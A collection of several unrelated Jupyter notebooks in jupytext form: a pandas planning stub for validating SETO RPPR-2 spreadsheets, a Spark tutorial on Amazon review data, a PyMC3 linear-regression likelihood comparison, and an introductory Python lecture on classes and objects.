# The U.S. Department of Energy's Solar Energy Technologies Office (SETO) utilizes a variety of documents for projects it funds to report on their current status. One such document is the RPPR-2 spreadsheet. This tool checks the RPPR-2 `.XLSX` file to see if it complies with SETO's template requirements file.
# # To Do List
#
# Here are the items I'm currently thinking need to be handled by this checker (updating these as I think of more):
#
# 1. Ask users to input the preceding quarter’s RPPR2 (if the award isn’t new) as well as the current RPPR2 so that we can check for cumulative updates.
# 2. Check each column AND row for any referential integrity issues:
# 1. If one column is calculated from another, check that the calculation is executing properly
# 2. Start and end dates should be earlier and later than one another, resp.
# 3. Define what columns are required in order to do even a partial data save on a given column
# 4. Check column dtypes for correctness
# 5. Check that percentages are between 1 and 0
# 3.
# # The Plan of Action
#
# 1. Import the template RPPR2
# * How to first inspect the tab names and tab count? Pandas won't do that automatically I think...
# * If you can count tabs only, return error if tab count is off, otherwise name the tabs that weren't expected as erroneous
# 2. Use the template to define:
# * What the list of proper tab names and count are
# * The size of the header above column names
# * Column names, number, and dtypes
# * For Accomplishments tab (only, I think?): Column EOL indicators so you know when you're seeing a new category
# 3. Pull in the n-1 RPPR2 (if not a new award) and the current RPPR2
# 1. Compare the two and make sure older data didn't disappear in newer RPPR2
# 2. Check the current RPPR2 for compliance with template requirements
# 3. If non-compliant, print out diagnostic report for everything obvious that you found
# * Include a line for non-equivalency that you may not have a pre-defined rule for and flag it in a separate repo file that can be referenced later for improving the code (a log file will work for this)
# * Lack of equivalency can be checked very thoroughly using `dataframe.equals(other_df)`, but it actually checks for identical elements too. Good thing to do for making sure you got two different RPPR2s, but otherwise need a more complicated check since we don't expect the same elements each time...quite the opposite in fact!
# * Might need to just check `dataframe.columns` for proper number and names of columns to start with
import pandas as pd
|
RPPR2-Checker.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Spark: Getting Started
# * These instructions require a Mac with [Anaconda3](https://anaconda.com/) and [Homebrew](https://brew.sh/) installed.
# * Useful for small data only. For larger data, try [Databricks](https://databricks.com/).
# ## Step 0: Prerequisites & Installation
#
# Run these commands in your terminal (just once).
#
# ```bash
# # Make Homebrew aware of old versions of casks
# brew tap caskroom/versions
#
# # Install Java 1.8 (OpenJDK 8)
# brew cask install adoptopenjdk8
#
# # Install the current version of Spark
# brew install apache-spark
#
# # Install Py4J (connects PySpark to the Java Virtual Machine)
# pip install py4j
#
# # Add JAVA_HOME to .bash_profile (makes Java 1.8 your default JVM)
# # echo "\nexport JAVA_HOME=$(/usr/libexec/java_home -v 1.8)" >> ~/.bash_profile
#
# # Add SPARK_HOME to .bash_profile
# # echo "\nexport SPARK_HOME=/usr/local/Cellar/apache-spark/2.4.3/libexec" >> ~/.bash_profile
#
# # Add PySpark to PYTHONPATH in .bash_profile
# # echo "\nexport PYTHONPATH=$SPARK_HOME/python:$PYTHONPATH" >> ~/.bash_profile
#
# # Update current environment
# source ~/.bash_profile
#
# ```
# ## Step 1: Create a SparkSession with a SparkContext
import pyspark
spark = pyspark.sql.SparkSession.builder.getOrCreate()
sc = spark.sparkContext
spark
sc
# ## Step 2: Download some Amazon reviews (Toys & Games)
# +
# Download data (run this only once)
# #!wget http://snap.stanford.edu/data/amazon/productGraph/categoryFiles/reviews_Toys_and_Games_5.json.gz
# #!gunzip reviews_Toys_and_Games_5.json.gz
# -
# ## Step 3: Create a Spark DataFrame
df = spark.read.json('reviews_Toys_and_Games_5.json')
df.persist()
df.limit(5).toPandas()
df.count()
reviews_df = df[['asin', 'overall']]
def show(df, n=5):
return df.limit(n).toPandas()
show(reviews_df)
reviews_df.count()
show(reviews_df)
sorted_review_df = reviews_df.sort('overall')
show(sorted_review_df)
import pyspark.sql.functions as F
counts = reviews_df.agg(F.countDistinct('overall'))
query = """
SELECT overall, COUNT(*)
FROM reviews
GROUP BY overall
ORDER BY overall
"""
reviews_df.createOrReplaceTempView('reviews')
output = spark.sql(query)
show(output, n=1000)
reviews_df.rdd
# ### Count the words in the first row
row_one = df.first()
row_one
def word_count(text):
return len(text.split())
word_count(row_one['reviewText'])
from pyspark.sql.types import IntegerType
word_count_udf = F.udf(word_count, IntegerType())
review_text_col = df['reviewText']
counts_df = df.withColumn('wordCount', word_count_udf(review_text_col))
show(counts_df).T
# +
from pyspark.sql.types import IntegerType
word_count_udf = F.udf(word_count, IntegerType())
df.createOrReplaceTempView('reviews')
spark.udf.register('word_count', word_count_udf)
# -
query = """
SELECT asin, overall, reviewText, word_count(reviewText) AS wordCount
FROM reviews
"""
counts_df = spark.sql(query)
show(counts_df)
def count_all_the_things(text):
return [len(text), len(text.split())]
from pyspark.sql.types import ArrayType, IntegerType
count_udf = F.udf(count_all_the_things, ArrayType(IntegerType()))
counts_df = df.withColumn('counts', count_udf(df['reviewText']))
show(counts_df, 1)
slim_counts_df = (
df.drop('reviewTime')
.drop('helpful')
.withColumn('counts', count_udf(df['reviewText']))
.drop('reviewText')
)
show(slim_counts_df, n=1)
import this
|
spark.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %pylab inline
import numpy as np
import theano
import pymc3 as pm
import theano.tensor as tt
import matplotlib.pylab as plt
import scipy as sci
N = 100
X = np.random.randn(N, 1)
eps = np.random.randn(N, 1)*.3
y = X*.4 + 1.5 + eps
plt.plot(X, y, 'o');
# # Loglikelihood function via potential
# +
with pm.Model() as m0:
beta = pm.Normal('beta', 0., 10.)
a = pm.Normal('a', 0., 10.)
pm.Normal('y', X*beta+a, 1., observed=y)
with pm.Model() as m1:
beta = pm.Flat('beta')
a = pm.Flat('a')
pm.Potential('logp_beta',
pm.Normal.dist(0., 10).logp(beta))
pm.Potential('logp_a',
pm.Normal.dist(0., 10).logp(a))
pm.Potential('logp_obs',
pm.Normal.dist(X*beta+a, 1.).logp(y))
# -
m0.free_RVs
m0.potentials
m1.free_RVs
m1.potentials
m0.test_point
m1.test_point
m0.logp(m0.test_point)
m1.logp(m0.test_point)
assert m0.logp(m0.test_point) == m1.logp(m0.test_point)
logp_dlogp0 = m0.logp_dlogp_function(m0.free_RVs)
logp_dlogp0
logp_dlogp0.dict_to_array(dict(a=np.array(1.), beta=np.array(2.)))
logp_dlogp0.set_extra_values({})
logp_dlogp0(np.asarray([2., 1.]))
logp_dlogp0(np.asarray([0., 0.]))
# +
logp_dlogp1 = m1.logp_dlogp_function(m1.free_RVs)
logp_dlogp1.set_extra_values({})
logp_dlogp1(np.asarray([2., 1.]))
# -
bv = np.linspace(0., 1., 100)
av = np.linspace(1., 2., 100)
bv_, av_ = np.meshgrid(bv, av)
_, ax = plt.subplots(1, 2, figsize=(10, 5))
for i, logp_dlogp in enumerate([logp_dlogp0, logp_dlogp1]):
logvec = np.asarray([logp_dlogp(np.asarray([b, a]))[0]
for b, a in zip(bv_.flatten(), av_.flatten())])
ll = logvec.reshape(av_.shape)
ax[i].imshow(np.exp(ll), cmap='viridis');
# # Different parameterization that produce the same logp
with pm.Model() as m0:
beta = pm.Normal('beta', 0, 10)
a = pm.Normal('a', 0, 10)
sd = pm.HalfNormal('sd', 5)
pm.Normal('y', X*beta+a, sd, observed=y)
trace0 = pm.sample()
with pm.Model() as m1:
beta = pm.Normal('beta', 0, 10)
a = pm.Normal('a', 0, 10)
sd = pm.HalfNormal('sd', 5)
pm.Normal('eps', 0, sd, observed=y - X*beta - a)
trace1 = pm.sample()
pm.traceplot(trace0);
pm.traceplot(trace1);
m1.test_point
m1.logp(m1.test_point)
m0.logp(m1.test_point)
with m0:
map0 = pm.find_MAP()
map0
with m1:
map1 = pm.find_MAP()
map1
# +
with pm.Model() as m0:
beta = pm.Normal('beta', 0, 10)
a = pm.Normal('a', 0, 10)
sd = pm.HalfNormal('sd', 5)
pm.Normal('y', X*beta+a, sd, observed=y)
logp_dlogp = m0.logp_dlogp_function([beta, a])
# -
logp_dlogp.set_extra_values({'sd_log__': np.log(1.)})
logp_dlogp.dict_to_array(dict(a=np.array(1.), beta=np.array(2.)))
logp_dlogp(np.asarray([2., 1.]))
bv = np.linspace(0., 1., 100)
av = np.linspace(1., 2., 100)
bv_, av_ = np.meshgrid(bv, av)
logvec = np.asarray([logp_dlogp(np.asarray([b, a]))[0]
for b, a in zip(bv_.flatten(), av_.flatten())])
ll = logvec.reshape(av_.shape)
plt.imshow(np.exp(ll), cmap='viridis');
# +
with pm.Model() as m0_:
beta = pm.Normal('beta', 0, 1)
a = pm.Normal('a', 0, 1)
sd = pm.HalfNormal('sd', 5)
pm.Normal('y', X*beta+a, sd, observed=y)
logp_dlogp = m0_.logp_dlogp_function([beta, a])
logp_dlogp.set_extra_values({'sd_log__': np.log(1.)})
logp_dlogp.dict_to_array(dict(a=np.array(1.), beta=np.array(2.)))
# +
logvec = np.asarray([logp_dlogp(np.asarray([b, a]))[0]
for b, a in zip(bv_.flatten(), av_.flatten())])
ll = logvec.reshape(av_.shape)
plt.imshow(np.exp(ll), cmap='viridis');
# -
|
Notebooks/Code4 - Linear_Regression.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# + [markdown] id="5UyFJYXOx-WH" slideshow={"slide_type": "slide"}
# # Lecture 12 - Classes and Objects (https://bit.ly/intro_python_12)
#
# * The basics of Python classes and objects:
# * Classes and Objects
# * The \__init__ constructor method
# * Object membership: Dot notation and classes
# * Everything is an object in Python!
# * Methods: adding functions to a class and the self argument
# * Object vs. class variables
# * Objects Mutability
# * Is vs. ==
# + [markdown] id="cMTiXTrGR1-y" slideshow={"slide_type": "slide"}
# # Object Oriented Programming (OOP)
#
# * As programs grow it is increasingly important to manage complexity, particularly to ensure that the state (all the variables and code) of the whole program are well organized.
#
# * We've seen **scope** rules and **modules** as ways of ensuring that **namespaces** don't become too complex.
# * e.g. ensuring that variables in one scope (e.g. a function) do not alter identically named variables in another scope.
# * Without these rules, we couldn't as easily reuse simple variable names like i, j, k across different bits of our program, because calling a function or importing a module might alter their value in unexpected ways.
#
# * In a non-OOP language like C, equivalents of modules and scope rules are all there are to manage complexity and avoid unexpected namespace collisions.
#
# * Python, however, is an OOP in which all elements of a program are "objects".
#
# * Objects are, loosely, a combination of functions and variables that allow you to create rich types.
#
# * Objects also provide "interfaces", ways of providing functionality abstract from the exact means by which it is implemented. In this way we'll learn about the concepts of "polymorphism" and the related concept of "inheritence".
# + [markdown] id="RfH9iOJpKnV7" slideshow={"slide_type": "slide"}
# # Classes and Objects
#
# A Python object is defined by creating a class definition. This uses the keyword "class":
# + id="bLaJky0K3AD2" slideshow={"slide_type": "fragment"}
class Point:
""" Point class represents and manipulates x,y coords. """ # we'll develop on this idea
pass
# + [markdown] id="2WQDsWcnYsj1" slideshow={"slide_type": "fragment"}
# In general classes have the following syntax:
# + id="xF7knWJ4Yv-5" slideshow={"slide_type": "fragment"}
class NameOfClass: #(Pep 8 says use CamelCase for class names)
""" Docstring describing the class """ # Docstring, which is optional
# Class stuff
#other statements outside of the class
#(Python uses the same indented whitespace
#rules to define what belongs to a class)
# + [markdown] id="SN3z_BEa4BJx" slideshow={"slide_type": "fragment"}
# Much like the relationship between function definitions and function calls: **objects are instances of classes**, created as follows:
# + colab={"base_uri": "https://localhost:8080/", "height": 34} executionInfo={"elapsed": 551, "status": "ok", "timestamp": 1573601734179, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="W8PSnxc_3_m1" outputId="068ffba4-4ba7-40be-951f-d5e69c3849c6" slideshow={"slide_type": "fragment"}
p = Point() # Create an object of type Point,
# the general syntax is ClassName(arguments), where ClassName
# is the name of the class.
type(p) # p is now an object, an "instance of" class Point
# + [markdown] id="-5-Ukx1s4dYw" slideshow={"slide_type": "slide"}
# # \__init__()
#
# * Python Classes can contain functions, termed methods.
#
# * The first example of a method we'll see is \__init__.
#
# * \__init__ is the object's "constructor", it allows us to instantiate the object by adding variables to a class as follows:
# + executionInfo={"elapsed": 723, "status": "ok", "timestamp": 1607911577003, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14Gh2rYrrH6yoNnUp0Oj4p4ouybc6ZcWGyPmKFtIY=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="_jfs8HBnKrPQ" slideshow={"slide_type": "fragment"}
class Point:
""" Point class represents and manipulates x,y coords. """
def __init__(self, x=0, y=0):
""" Create a new point at the origin
This method will be called implicitly when we make a point object.
"""
self.x = x # The self argument to method represents the
# object, and allows you to assign stuff to the object
self.y = y
# + [markdown] id="tgUCAlkN-8w7" slideshow={"slide_type": "fragment"}
# * The key difference between a method and a function, apart from a method belonging to a class, is the first argument: **self**.
#
# * It is called "self" by convention - you could name it what you like (but don't! - call it self!)
#
# * self is a reference to the object itself. it is how we reference things belonging to the object, like variables.
# + [markdown] id="PLrrQ0uq6j00" slideshow={"slide_type": "subslide"}
# We can now create a Point object using much the same syntax we use for calling any function:
# + executionInfo={"elapsed": 836, "status": "ok", "timestamp": 1607901543656, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14Gh2rYrrH6yoNnUp0Oj4p4ouybc6ZcWGyPmKFtIY=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="dpAjByq22flF" slideshow={"slide_type": "fragment"}
p = Point(10, 11) # Make an object of type Point, this implicitly calls the __init__() method
# making 10 to the x argument, and 11 the y argument
# + [markdown] slideshow={"slide_type": "fragment"}
# To understand the implicit stuff happening:
# + slideshow={"slide_type": "fragment"}
# When you write "p = Point(10, 11)" this happens...
p = Point.__new__(Point) # Roughly, this allocates the memory for the p object and sets up the object
Point.__init__(p, 10, 11) # This then "instantiates" the variables, e.g. x and y
# + [markdown] id="n5JZwJmuLXSQ" slideshow={"slide_type": "slide"}
# # Object membership: Dot notation and classes
#
# To access the variables in a class
# + colab={"base_uri": "https://localhost:8080/", "height": 34} executionInfo={"elapsed": 290, "status": "ok", "timestamp": 1573602204578, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="UsqoomyqK-Sp" outputId="8baee511-ea61-4156-8550-027df6259550" slideshow={"slide_type": "fragment"}
print(p.x, p.y) # This syntax has the form "object.attribute"
# + colab={"base_uri": "https://localhost:8080/", "height": 34} executionInfo={"elapsed": 374, "status": "ok", "timestamp": 1573602222322, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="1ys_lhrmLgaK" outputId="6d236eb0-b3fa-4761-c0d7-7c808059a9b8" slideshow={"slide_type": "fragment"}
p.x = 5 # We can update the values of x and y by reassignment
p.y = 10
print(p.x, p.y)
# + [markdown] slideshow={"slide_type": "slide"}
# # Classes vs. Objects
#
# The following silly diagram illustrates the difference between a Class and Objects of that class:
#
# <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/6/62/CPT-OOP-objects_and_classes.svg/2560px-CPT-OOP-objects_and_classes.svg.png" width=800 height=400 />
#
# + slideshow={"slide_type": "subslide"}
# As the previous picture illustrates, we are free to make as many objects of a class as we like:
p = Point(10, 11) # p and q are distinct objects of the same class
q = Point(4, 2)
print("p.x", p.x, "p.y", p.y) # Different x and y values
print("q.x", q.x, "q.y", q.y)
print("Objects the same:", p == q) # Not the same object
# + [markdown] slideshow={"slide_type": "subslide"}
# # Challenge 1
# + slideshow={"slide_type": "fragment"}
# Write a class definition for a new class called "Vehicle".
# Add an __init__ method that takes a single argument "color" and
# sets the value as an attribute "color"
# This code should work:
v = Vehicle("purple")
print(v.color)
# + [markdown] slideshow={"slide_type": "slide"}
# # What is the type of p (and q)?
# + slideshow={"slide_type": "fragment"}
print(type(p))
print(type(q))
# + [markdown] slideshow={"slide_type": "fragment"}
# Which leads us to our next discovery..
# + [markdown] id="YZm69sZRRsQn" slideshow={"slide_type": "slide"}
# # Everything is an object in Python!!!!
#
# Before today we've seen lots of basic Python elements: ints, strings, floats, booleans, lists, tuples, etc.
#
# Every instance of these types is actually an object (mind blown!) and has a class (wow!) consider a string:
# + colab={"base_uri": "https://localhost:8080/", "height": 34} executionInfo={"elapsed": 348, "status": "ok", "timestamp": 1573602247980, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="HZqD5JoJ9ujf" outputId="42480de3-7a07-4921-cf12-a0a31f1415dc" slideshow={"slide_type": "fragment"}
type("hello")
# + colab={"base_uri": "https://localhost:8080/", "height": 34} executionInfo={"elapsed": 434, "status": "ok", "timestamp": 1573602255762, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="ok0uTDxL-pBK" outputId="5679b7da-7bc0-48bd-80c8-7ed0704d5d44" slideshow={"slide_type": "fragment"}
"hello".__class__ # We can also use the __class__ variable of any object to find the "type" or
# class of the object, i.e. __class__ is an attribute on the object that refers to the class from
# which the object was created.
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} executionInfo={"elapsed": 303, "status": "ok", "timestamp": 1573602268524, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="eglFDImz-akm" outputId="6d619a3f-28f2-4a56-b18f-359f043374ed" slideshow={"slide_type": "fragment"}
dir("hello")
# + [markdown] slideshow={"slide_type": "subslide"}
# What about the attributes of our point object, p?
# + colab={"base_uri": "https://localhost:8080/", "height": 507} executionInfo={"elapsed": 349, "status": "ok", "timestamp": 1573602304109, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="uq5KpijFAXrf" outputId="27b26598-d9ed-4e4a-92c6-9b6eead85a8d" slideshow={"slide_type": "fragment"}
dir(p)
# + [markdown] slideshow={"slide_type": "fragment"}
# Note that in addition to the x and y variables, p has many additional attributes, we'll learn about where those come from when we study inheritance.
# + [markdown] id="ZVH9QrmLL2OS" slideshow={"slide_type": "slide"}
# # Methods: Adding Functions to an object
#
# * The \__init__() we added was an instance of a **method**, a function belonging to an object.
#
# * We are free to add user defined methods:
#
# + id="DjkEz_2DMA4x" slideshow={"slide_type": "fragment"}
class Point:
""" Create a new Point, at coordinates x, y """
def __init__(self, x=0, y=0):
""" Create a new point at x, y """
self.x = x
self.y = y
def distance_from_origin(self): # We see the "self" argument again
""" Compute my distance from the origin """
return ((self.x ** 2) + (self.y ** 2)) ** 0.5 # This is just Pythagorus's theorem
# + colab={"base_uri": "https://localhost:8080/", "height": 34} executionInfo={"elapsed": 419, "status": "ok", "timestamp": 1573602799832, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="Cs-_HBW-MZ8H" outputId="6a5229cb-a122-43f6-edce-7742366aab33" slideshow={"slide_type": "fragment"}
p = Point(3, 4)
p.distance_from_origin()
# + [markdown] id="47UIdaWFCOL6" slideshow={"slide_type": "fragment"}
# * Adding methods to a class definition is a natural way to group functionality (e.g. in this example, geometric functions) with variables (more generally state), (e.g. in this example, with coordinates).
#
# * To recap, the only major structural differences between a regular function and a method are:
# * The "self" argument
# * The use of dot notation to invoke the function
#
#
# + [markdown] slideshow={"slide_type": "subslide"}
# # Challenge 2
# + slideshow={"slide_type": "fragment"}
# Expand the Vehicle class you wrote in Challenge 1 by adding a method
# print_color, which prints the color of the Vehicle to the screen
# This code should work
v = Vehicle("purple")
v.print_color()
# + [markdown] id="c4kF3OFFI0eo" slideshow={"slide_type": "slide"}
# # Object vs. class variables
#
# As we said earlier, the variables defined in the constructor are unique
# to an object:
# + colab={"base_uri": "https://localhost:8080/"} executionInfo={"elapsed": 705, "status": "ok", "timestamp": 1607911746547, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14Gh2rYrrH6yoNnUp0Oj4p4ouybc6ZcWGyPmKFtIY=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="uT3atnUxLcYm" outputId="d08eca43-29fa-4b93-ef49-a878e06d87d8" slideshow={"slide_type": "fragment"}
p = Point(3, 4)
q = Point(10 ,12) # Make a second point
print(p.x, p.y, q.x, q.y) # Each point object (p and q)
# has its own x and y
# + [markdown] id="UHWmQ4VzPRyF" slideshow={"slide_type": "subslide"}
# If you want to create a variable shared by all objects you can use a class variable:
# + colab={"base_uri": "https://localhost:8080/"} executionInfo={"elapsed": 720, "status": "ok", "timestamp": 1607911766447, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14Gh2rYrrH6yoNnUp0Oj4p4ouybc6ZcWGyPmKFtIY=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="EpGKO-ADPuKY" outputId="5ed91ed1-076e-4053-cc76-ebc45db744d7" slideshow={"slide_type": "fragment"}
class Point:
""" Create a new Point, at coordinates x, y """
# Class variables are defined outside of __init__ and are shared
# by all objects of the class
theta = 10
def __init__(self, x=0, y=0):
""" Create a new point at x, y """
self.x = x
self.y = y
# Etc.
p = Point(3, 4)
q = Point(9, 10)
print("Before", p.theta, q.theta)
Point.theta = 20 # There is only one theta, so we just
# changed theta value for all Point objects -note the use of the class name
print("After", p.theta, q.theta)
# + [markdown] id="EHQ3hZWQQZvQ" slideshow={"slide_type": "fragment"}
# The benefit of class variables being shared is primarily memory - if you have something that is the same across all objects of a class, use a class variable.
# + colab={"base_uri": "https://localhost:8080/"} executionInfo={"elapsed": 763, "status": "ok", "timestamp": 1607911778698, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14Gh2rYrrH6yoNnUp0Oj4p4ouybc6ZcWGyPmKFtIY=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="60r39t4VyZSo" outputId="e47c398a-399f-43c6-dd3a-d3a9e189a773" slideshow={"slide_type": "subslide"}
# Note, this doesn't work the way you might expect:
p.theta = 5
print("Again", p.theta, q.theta)
# This is because assigning to p.theta creates a new object variable that overrides
# the class variable in the scope of the object - it's those pesky scope rules again
print(Point.theta)
# + [markdown] slideshow={"slide_type": "subslide"}
# # Challenge 3
# + slideshow={"slide_type": "fragment"}
# Redefine the Vehicle class from Challenges 1 and 2 to include a class variable "speed_limit" setting it to 100
# This code should work
v = Vehicle("purple")
v.print_color()
print(v.speed_limit)
# + [markdown] id="xIC6Gf32QoXP" slideshow={"slide_type": "slide"}
# # Object Mutability
#
# Python objects are mutable.
# + colab={"base_uri": "https://localhost:8080/"} executionInfo={"elapsed": 792, "status": "ok", "timestamp": 1607911832561, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14Gh2rYrrH6yoNnUp0Oj4p4ouybc6ZcWGyPmKFtIY=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="MXyKWy2wKAL4" outputId="f286e558-3828-4b21-fe4d-e56afa6ead20" slideshow={"slide_type": "fragment"}
p = Point(5, 10)
p.x += 5 # You can directly modify variables
print(p.x)
# You can even add new variables to an object
p.new_variable = 1
print(p.new_variable)
# + colab={"base_uri": "https://localhost:8080/", "height": 219} executionInfo={"elapsed": 429, "status": "error", "timestamp": 1573603367495, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="F-iqtMhWKiwv" outputId="c53305fe-333b-4039-82b7-462c5f174cfc" slideshow={"slide_type": "fragment"}
# But note, this doesn't add a "new_variable" to other points
# you might have or create
q = Point(5, 10)
q.new_variable # This doesn't exist,
# because you only added "new_variable" to q
# + [markdown] id="73mwHvO3LApm" slideshow={"slide_type": "subslide"}
# # Modifier Methods
#
# * In general, when changing an object, it is often helpful/cleaner to add "modifier" functions to change the underlying variables, e.g.:
# + colab={"base_uri": "https://localhost:8080/", "height": 34} executionInfo={"elapsed": 304, "status": "ok", "timestamp": 1573603551840, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="3X80Tbi8LBje" outputId="57b12dcc-ca2f-45f6-9dde-8f976e8ea79a" slideshow={"slide_type": "fragment"}
class Point:
""" Create a new Point, at coordinates x, y """
def __init__(self, x=0, y=0):
""" Create a new point at x, y """
self.x = x
self.y = y
def move(self, deltaX, deltaY):
""" Moves coordinates of point
( this is a modifier method, which you call to
change x and y)
"""
self.x += deltaX
self.y += deltaY
p = Point()
p.move(5, 10)
print(p.x, p.y)
# + [markdown] id="vBsLiWKcMQwl" slideshow={"slide_type": "fragment"}
# * Modifiers can be used to check changes make sense (using asserts or exceptions)
# * Modifiers can be used to create more abstract interfaces (avoiding direct variable access)
# * Sometimes however, modifiers can just be busy work - your mileage may vary
# + [markdown] slideshow={"slide_type": "subslide"}
# # Challenge 4
# + slideshow={"slide_type": "fragment"}
# Redefine the Vehicle class from Challenge 3 to include a modifier method "respray" that takes a color argument
# and sets the color variable
# This code should work
v = Vehicle("purple")
v.print_color()
v.respray("green")
v.print_color()
# + [markdown] id="2Yuc8SctO79J" slideshow={"slide_type": "slide"}
# # Is vs. ==
#
# So far we have seen == as a way to test if two things are equal.
#
# We can also ask if they represent the exact same object (i.e. same instance of a class at a given location in computer memory)
# + id="ue4Ztfs-ZUVJ" slideshow={"slide_type": "fragment"}
x = 1
y = 1
x == y # Clearly, 1 = 1.
# Under the hood Python is testing if x and y refer to are equivalent, even if they
# represent two separate instances in memory of the same thing.
# + colab={"base_uri": "https://localhost:8080/", "height": 34} executionInfo={"elapsed": 309, "status": "ok", "timestamp": 1573603711820, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="mdbazTzkax-5" outputId="71ce5fef-5c5e-4555-b800-4fe05746d846" slideshow={"slide_type": "fragment"}
x is y # This is asking if x is referring to the same thing in memory as y.
# Python is generally smart enough to cache numbers, strings, etc. so that it doesn't duplicate
# memory storing the same thing twice - although be careful about relying on this caching
# Because numbers, strings and tuples are immutable this caching does not affect
# the behavior of the program.
# + colab={"base_uri": "https://localhost:8080/", "height": 34} executionInfo={"elapsed": 527, "status": "ok", "timestamp": 1573604050290, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="OHfy_seEbg8a" outputId="e6cb8ce2-4897-4520-f1d2-d6874abfe631" slideshow={"slide_type": "subslide"}
x = [ 1 ]
y = [ 1 ]
x == y # The two lists are equivalent
# + colab={"base_uri": "https://localhost:8080/", "height": 34} executionInfo={"elapsed": 320, "status": "ok", "timestamp": 1573603736185, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="TOg3FSdHbqGK" outputId="545d55e4-e49e-441b-eb79-5995b295e36e" slideshow={"slide_type": "fragment"}
x is y # But they are not the same instance in memory, why?
# + [markdown] id="lTFyhXRQbxvv" slideshow={"slide_type": "fragment"}
# If Python decided to cache x and y to the same list in memory then changes to x would affect y and vice versa, leading to odd behaviour, e.g.:
# + colab={"base_uri": "https://localhost:8080/", "height": 34} executionInfo={"elapsed": 359, "status": "ok", "timestamp": 1573604056843, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="twR9Y5WXb8jt" outputId="f0f89ef2-aea6-4737-b46b-8af6645cc7cd" slideshow={"slide_type": "subslide"}
# Consider
x = [ 1 ]
y = [ 1 ]
x.append(2)
print(x, y) # The append to x did not affect y
